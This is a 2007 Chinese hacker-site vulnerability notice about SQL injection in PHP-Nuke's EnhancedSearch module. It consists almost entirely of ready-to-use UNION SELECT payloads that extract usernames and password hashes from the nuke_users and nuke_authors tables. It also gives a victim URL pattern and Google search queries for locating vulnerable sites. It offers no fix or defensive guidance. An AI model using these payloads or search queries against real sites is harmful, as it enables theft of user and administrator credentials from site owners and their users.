PHPNuke所有版本EnhancedSearch文件存在注入漏洞〓华西安全联盟华西黑客联盟〓 >> —

当前位置：主页 > 安全公告 > 漏洞公告 > 文章内容

　　您对新版的建议

PHPNuke所有版本EnhancedSearch文件存在注入漏洞

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------

SQLInjection:

EnhancedSearch%')UNIONSELECT0,user_id,username,user_password,0,0,0,0,0,0FROMnuke_users/*

EnhancedSearch%')UNIONSELECT0,pwd,name,aid,0,0,0,0,0,0FROMnuke_authors/*

EnhancedSearch%')UNIONALLSELECT1,2,aid,pwd,5,6,7,8,9,10FROMnuke_authors/*

-------------------------------------------

http://www.victim.com/path/modules.php?name=EnhancedSearch

Search:

EnhancedSearch%')UNIONALLSELECT1,2,aid,pwd,5,6,7,8,9,10FROMnuke_authors/*

-------------------------------------------

google:

"EnhancedSearchVersion2.0:Poweredby"

inurl:"modules.php?name=EnhancedSearch"

【免费加入会员】【我要投稿】【关闭本页】

---------------------------------------------------------------------------------------------------
上一篇：Bo-blog跨站漏洞下一篇：WordPress多个插件远程文件包含漏洞
---------------------------------------------------------------------------------------------------
用户名：
Email：
评论内容：

精品推荐

IE 6 被发现严重漏洞
微软严重漏洞使全部图片
MS08-067漏洞模拟攻击原型
趋势科技：2008年上半年威
Adobe官网爆SQL注入漏洞
微软破例紧急公布严重漏洞
雅虎招聘网存跨站脚本攻击
微软预警:ActiveX再度引来
Google手机上市即曝严重漏
2008年上半年安全研究报告
多家防病毒公司预警微软图
雅虎HotJobs网站发现跨站
Firefox3存重大漏洞可致D
微软12月安全公告:含8个重
公布漏洞：多款RSS阅读器